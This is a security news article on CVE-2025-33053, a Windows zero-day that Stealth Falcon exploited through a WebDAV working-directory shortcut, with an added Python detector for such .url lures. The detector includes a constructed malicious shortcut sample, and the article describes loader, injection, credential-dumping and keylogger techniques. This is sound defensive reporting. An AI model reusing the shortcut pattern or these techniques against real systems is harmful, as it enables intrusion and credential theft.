The Egyptian god with a falcon’s head now lives in your Edge — but this is no mythology, it’s a new 0day.
PDF is not to blame — it’s just been possessed by a demon from a WebDAV server.
In the June Microsoft update, a critical zero-day vulnerability tracked as CVE-2025-33053 was patched. This vulnerability had been actively exploited by the Stealth Falcon APT group to execute remote code on Windows systems. The vulnerability allowed attackers to change the working directory of system utilities and run malicious executables from WebDAV servers. According to Check Point, the attack was first detected in March 2025 during an attempt to compromise a Turkish defense company.
The infection chain started with a phishing email attachment: a malicious file with a .url extension, disguised as a PDF document. When opened, the object named “TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url” triggered the launch of “iediagcmd.exe,” a built-in Windows utility, which then loaded its helper “route.exe” not from the local disk but from an external WebDAV server, where a trojan of the same name resided. This bypass of trusted paths was achieved through working directory manipulation, allowing the malicious file to take priority over the legitimate one.
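The lure described above is an ordinary Internet Shortcut file whose working directory has been pointed at a remote share. The following triage routine, an added example that is not part of the article or of Check Point's report, parses a .url file with the standard InternetShortcut keys and flags the combination of a document-looking double extension, a URL field that names a local executable, and a WebDAV/UNC working directory. The sample shortcuts and the IP address are constructed; the exact field contents of the real lure are not given in the article.

```python
"""Triage Windows Internet Shortcut (.url) files for the WebDAV working-directory
pattern: a shortcut that launches a local system utility while its working directory
points at a remote WebDAV/UNC share. Key names follow the standard InternetShortcut
INI format; the samples below are constructed for illustration."""
import configparser
import re

# Working directory on a UNC or WebDAV path (\\host@SSL\DavWWWRoot\...) or an http(s) URL
REMOTE_DIR = re.compile(r"^(\\\\|//|https?://)", re.IGNORECASE)
# Utilities known to resolve a same-named helper from the working directory.
# iediagcmd.exe is the one named in the article; extending the set is an assumption.
WATCHED_UTILS = {"iediagcmd.exe"}

def parse_url_file(text):
    """Return the [InternetShortcut] section as a dict with lower-cased keys."""
    cp = configparser.ConfigParser(interpolation=None)  # values may contain '%'
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        return {}
    return {k.lower(): v for k, v in cp.items("InternetShortcut")}

def triage_url_file(filename, text):
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    keys = parse_url_file(text)
    target = keys.get("url", "")
    workdir = keys.get("workingdirectory", "")
    findings = []
    # A shortcut posing as a document, e.g. "report.pdf.url"
    if re.search(r"\.(pdf|docx?|xlsx?)\.url$", filename, re.IGNORECASE):
        findings.append("double-extension lure")
    # URL= names a local executable rather than a web address
    if target.lower().endswith(".exe") and not target.lower().startswith("http"):
        findings.append("URL points to local executable")
        basename = target.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if basename in WATCHED_UTILS:
            findings.append("launches watched system utility")
    # Working directory on a remote share: the CVE-2025-33053 abuse pattern
    if REMOTE_DIR.match(workdir):
        findings.append("working directory is remote (WebDAV/UNC)")
    return findings

# Constructed samples (203.0.113.5 is a documentation address, not a real host)
SAMPLE_MALICIOUS = """[InternetShortcut]
URL=C:\\Program Files\\Internet Explorer\\iediagcmd.exe
WorkingDirectory=\\\\203.0.113.5@SSL\\DavWWWRoot\\share
"""
SAMPLE_BENIGN = """[InternetShortcut]
URL=https://www.example.com/
"""

if __name__ == "__main__":
    print(triage_url_file("report.pdf.url", SAMPLE_MALICIOUS))
    print(triage_url_file("site.url", SAMPLE_BENIGN))
```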
Experts note that this is the first known case of exploiting a WebDAV server by launching an executable file using native Windows tools rather than scripts or loaders. This finding highlights the innovative tactics of Stealth Falcon, also known as FruityArmor — a group active since 2012 and specialized in attacks on government and defense entities in the Middle East and Africa.
As part of this campaign, a new malware platform called Horus Agent was deployed, built on the Mythic C2 framework and named after the Egyptian god with a falcon’s head. Its initial stage was Horus Loader — a C++ loader protected through Code Virtualizer, capable of evading analysis by manually mapping “kernel32.dll” and “ntdll.dll” libraries. It checked for the presence of 109 antivirus processes from 17 vendors and masked its activity by decrypting and displaying a fake PDF document to distract the victim.
The loader used a technique called IPfuscation — encrypting the payload inside IPv6 addresses — and injected it into the Microsoft Edge browser process via system calls ZwAllocateVirtualMemory, ZwWriteVirtualMemory, and NtResumeThread. The final stage was the Horus Agent itself — a module with a deep level of obfuscation (OLLVM obfuscation, string encryption with a shift of -39, control flow flattening, and API hashing). The agent communicated with C2 servers over HTTP using AES encryption and HMAC-SHA256 signature, supported up to four domains, and included a kill switch with a date set to December 31, 2099.
Among its supported commands were system information gathering (survey) and shellcode injection (shinjectchunked). The group also deployed additional tools, including:
- Spayload — another Mythic module with extended capabilities;
- DC Credential Dumper — a tool for extracting NTDS.dit, SAM, and SYSTEM files by mounting a virtual disk “C:\ProgramData\ds_notifier_0.vhdx” and then compressing the data into a ZIP archive;
- Passive Backdoor (“usrprofscc.exe”) — a background service with administrative privileges waiting for shellcode in encrypted form;
- Keylogger (“StatusReport.dll”) — a module injected into “dxdiag.exe” that recorded keystrokes into an RC4-encrypted log at “C:\Windows\Temp\~TN%LogName%.tmp”.
Microsoft fixed CVE-2025-33053 in the June Patch Tuesday update. Check Point experts recommend immediately updating Windows and implementing additional measures: raising employee awareness of phishing, monitoring network traffic, especially traffic related to WebDAV and suspicious domains, and using security solutions to detect attempts to bypass system utilities and inject code.
Stealth Falcon’s activity underscores the high technical proficiency of the attackers and their ability to adapt to the latest security mechanisms. The focus of these attacks remains on government entities and companies with critical infrastructure, especially in the Middle East, requiring organizations to maintain continuous monitoring and prompt response.